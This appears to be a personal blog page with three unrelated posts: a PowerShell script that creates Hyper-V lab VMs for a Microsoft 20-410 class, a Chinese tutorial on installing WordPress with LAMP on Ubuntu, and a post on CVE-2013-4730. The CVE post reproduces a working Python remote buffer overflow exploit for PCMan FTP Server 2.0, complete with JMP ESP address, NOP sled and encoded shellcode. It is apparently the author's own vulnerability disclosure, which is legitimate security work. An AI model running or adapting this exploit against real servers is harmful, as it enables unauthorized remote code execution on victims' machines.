Create project environment for class 20-410

This script is used in class Microsoft(20-410) for setting up project environment.


##################################################################
#   * Please create hyper-V network switch manually
#   * Set switch to be private. Name "Private Network"
#   * Please run this script as Administrator privilege
#   
#   Raymond Liu 
#   Team: Round 3
#
#   2016 / 10 / 26 v1
#   2016 / 11 / 9  v1.3
################# Settings ################################

$MECO_DC1      = "MECO-DC1"                                                                 # Implement server with: AD DS, DNS, DHCP
$MECO_DC2      = "MECO-DC2"                                                                 # Implement Secondary AD DS role only
$MECO_FS1      = "MECO-FS1"                                                                 # Implement domain joined File Server
$MECO_WS1      = "MECO-WS1"                                                                 # Implement domain joined Intranet Web Server
$MECO_CL1      = "MECO-CL1"                                                                 # Implement Domain joined client workstation
$MECO_CL2      = "MECO-CL2"                                                                 # Implement Domain joined client workstation
$MECO_RTR1     = "MECO-RTR1"                                                                # Implement Domain joined RRAS Routing Server and VPN
$MECO_NAT      = "MECO-NAT"                                                                 # Implement NAT Serevr
$RAM           = 2GB  				                                                        # RAM assigned to VM
$VHD           = 127GB  			                                                        # Size of Hard-Drive for VM
$GENERATION    = 1                                                                          # VM Generation 
$VM_Folder     = "C:\Project"                                                               # Location of the VM and VHDX files
$VMSwitch      = "Private Network"                                                          # Name of the Hyper-v Network Switch
$VMSwitch2     = "External"                                                                 # Name of the Hyper-v Network Switch
$W8ISO         = "..\OS\Windows 8.1 Enterprise 64BIT_English_MLF_X18-96759.iso"	            # Windows 8.1 ISO
$W12ISO        = "..\OS\en_windows_server_2012_r2_with_update_x64_dvd_6052708.iso"	        # Windows Server 2012 R2 ISO

################# Settings ################################

################# Create Hyper-V VM folder ################
# Create Hyper-V VM folder
try {

    MD $VM_Folder -ErrorAction SilentlyContinue

} catch {

    Write-Host("`n[ERROR] Can't Create VM Folder. `n") -ForegroundColor Red
    Exit 1 

}

################# Create Hyper-V VM folder ################

################# Create VM ###############################
# Create VM
try {

    New-VM -Name $MECO_DC1 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_DC1"\Virtual Hard Disks\"$MECO_DC1.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_DC1. `n") -ForegroundColor Red
    Exit 1 

} # MECO_DC1

try {

    New-VM -Name $MECO_DC2 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_DC2"\Virtual Hard Disks\"$MECO_DC2.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_DC2. `n") -ForegroundColor Red
    Exit 1 

} # MECO_DC2

try {

    New-VM -Name $MECO_FS1 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_FS1"\Virtual Hard Disks\"$MECO_FS1.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_FS1. `n") -ForegroundColor Red
    Exit 1 

} # MECO_FS1


try {

    New-VM -Name $MECO_WS1 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_WS1"\Virtual Hard Disks\"$MECO_WS1.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_WS1. `n") -ForegroundColor Red
    Exit 1 

} # MECO_WS1


try {

    New-VM -Name $MECO_CL1 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_CL1"\Virtual Hard Disks\"$MECO_CL1.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_CL1. `n") -ForegroundColor Red
    Exit 1 

} # MECO_CL1


try {

    New-VM -Name $MECO_CL2 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_CL2"\Virtual Hard Disks\"$MECO_CL2.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_CL2. `n") -ForegroundColor Red
    Exit 1 

} # MECO_CL2


try {

    New-VM -Name $MECO_RTR1 `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_RTR1"\Virtual Hard Disks\"$MECO_RTR1.vhdx `
           -NewVHDSizeBytes $VHD `
           -SwitchName $VMSwitch `
           -Generation $GENERATION

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_RTR1. `n") -ForegroundColor Red
    Exit 1 

} # MECO_RTR1


try {

    New-VM -Name $MECO_NAT `
           -Path $VM_Folder `
           -MemoryStartupBytes $RAM `
           -NewVHDPath $VM_Folder\$MECO_NAT"\Virtual Hard Disks\"$MECO_NAT.vhdx `
           -NewVHDSizeBytes $VHD `
		   -SwitchName $VMSwitch2 `
           -Generation $GENERATION
		   
    Add-VMNetworkAdapter -VMName $MECO_NAT -SwitchName $VMSwitch

} catch {

    Write-Host("`n[ERROR] Can't Create VM MECO_NAT. `n") -ForegroundColor Red
    Exit 1 

} # MECO_NAT

################# Create VM ###############################


################# Set VM ISO ##############################
# Set VM ISO
try {

    Set-VMDvdDrive -VMName $MECO_DC1 `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_DC1) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_DC1. `n") -ForegroundColor Red
    Exit 1 
} # MECO_DC1

try {

    Set-VMDvdDrive -VMName $MECO_DC2 `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_DC2) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_DC2. `n") -ForegroundColor Red
    Exit 1 
} # MECO_DC2

try {

    Set-VMDvdDrive -VMName $MECO_FS1 `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_FS1) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_FS1. `n") -ForegroundColor Red
    Exit 1 
} # MECO_FS1

try {

    Set-VMDvdDrive -VMName $MECO_WS1 `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_WS1) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_WS1. `n") -ForegroundColor Red
    Exit 1 
} # MECO_WS1

try {

    Set-VMDvdDrive -VMName $MECO_CL1 `
                   -Path $W8ISO


    Write-Host("Done Create VM: --> " + $MECO_CL1) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_CL1. `n") -ForegroundColor Red
    Exit 1 
} # MECO_CL1


try {

    Set-VMDvdDrive -VMName $MECO_CL2 `
                   -Path $W8ISO


    Write-Host("Done Create VM: --> " + $MECO_CL2) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_CL2. `n") -ForegroundColor Red
    Exit 1 
} # MECO_CL2


try {

    Set-VMDvdDrive -VMName $MECO_RTR1 `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_RTR1) -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_WS1. `n") -ForegroundColor Red
    Exit 1 
} # MECO_RTR1


try {

    Set-VMDvdDrive -VMName $MECO_NAT `
                   -Path $W12ISO

    Write-Host("Done Create VM: --> " + $MECO_NAT + "`n") -ForegroundColor Green

} catch {

    Write-Host("`n[ERROR] Can't Set VM MECO_NAT. `n") -ForegroundColor Red
    Exit 1 
} # MECO_NAT



################# Set VM ISO ##############################


# Star VM
try {

    #Start-VM $MECO_DC1

} catch {

    #Write-Host("`n[ERROR] Can't Start VM MECO_DC1. `n") -ForegroundColor Red
    #Exit 1 

}



Exit 1

Install WordPress with LAMP on Ubuntu

這幾天想說要重新架設Blog,在上面紀錄和整理自己的作品還有讀書研究時的筆記和遇到的問題。
給自己很多理由比如寫這個很無聊….哈..就一直拖延,但昨天失心瘋突然就下定決心回家一定要馬上處理這件事情。
晚上十點多回到家就開了一個新的Linode Server開始架設 🙂
之前我的Blog都偏黑色系,但現在我反而喜歡亮一點可愛一點? XD和簡單一點的樣式。

選擇Wordpress有幾個原因,除了才疏學淺沒有用過太多CMS外,最主要的原因是:

 Wordpress是主流的Blog和網站建置CMS之一有很多資料可以查和theme可以用,使用起來不複雜 

Step 1 安裝Apache

sudo apt-get install apache2
sudo a2enmod rewrite

在做個簡單的設定

sudo nano /etc/apache2/apache2.conf
然後加入這段
"
<Directory /var/www/html/> 
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>

"
修改index.php順位
sudo nano /etc/apache2/mods-enabled/dir.conf

把index.php移到前面
<IfModule mod_dir.c> 
    DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm 
</IfModule>

Step 2 安裝MySQL Sever

sudo apt-get install mysql-server
sudo mysql_secure_installation 

Step 3 設定Databse給Wordpress用

先登入MySQL
mysql -u root -p

建立一個新的資料庫給Wordpress
CREATE DATABASE wordpress;

可以新建一個mysql user
CREATE USER 'user' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON wordpress.* TO 'user';
FLUSH PRIVILEGES;
EXIT;

Step 4 安裝PHP

sudo apt-get install php libapache2-mod-php php-mcrypt php-mysql php-cli

Step 5 下載並解壓縮Wordpress

下載並解壓縮Wordpress到網頁目錄
wget -c http://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz

設定權限
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/

Step 6 設定wp-config.php

先在Blog目錄下把wp-config-sample.php改名為wp-config.php
sudo mv wp-config-sample.php wp-config.php

然後設定wp-config.php把相關的資料庫資料輸入即可
sudo nano wp-config.php

Step 7 重新啟動Apache 和MySQL

sudo service apache2 restart
sudo service mysql restart

之後用網頁瀏覽器瀏覽網站,再完成Wordpress的相關設定就好了

🙂

然後就是現在你們所看到的這個網站了 XD

[CVE-2013-4730] PCMan FTP Server 2.0.7 – Buffer Overflow

這是很久之前發現的漏洞,結果後來很多人都陸續寫了相關的exploit (= =)

EDB-ID: 26495 : https://www.exploit-db.com/exploits/26495/



#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
 
import socket
import sys
 
USER    = "anonymous"
PASSWD  = "TEST"
 
PAYLOAD = "\x41" * 2010
EIP     = "\xDB\xFC\x1C\x75"  # 751CFCDB   JMP ESP USER32.DLL
NOP     = "\x90" * 10
 
SHELLCODE =(
   "\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9"
   "\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71"
   "\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84"
   "\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f"
   "\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1"
   "\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40"
   "\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb"
   "\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78"
   "\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2"
   "\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56"
   "\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2"
   "\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e"
   "\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb"
   "\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c"
   "\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83"
   "\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0"
   "\xda\xca\x18");
 
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)
 
 
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
 
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
 
 
 
print("[-] Sending exploit...\n")
s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n')
s.close()
 
print("[!] Done! Exploit successfully sent\n")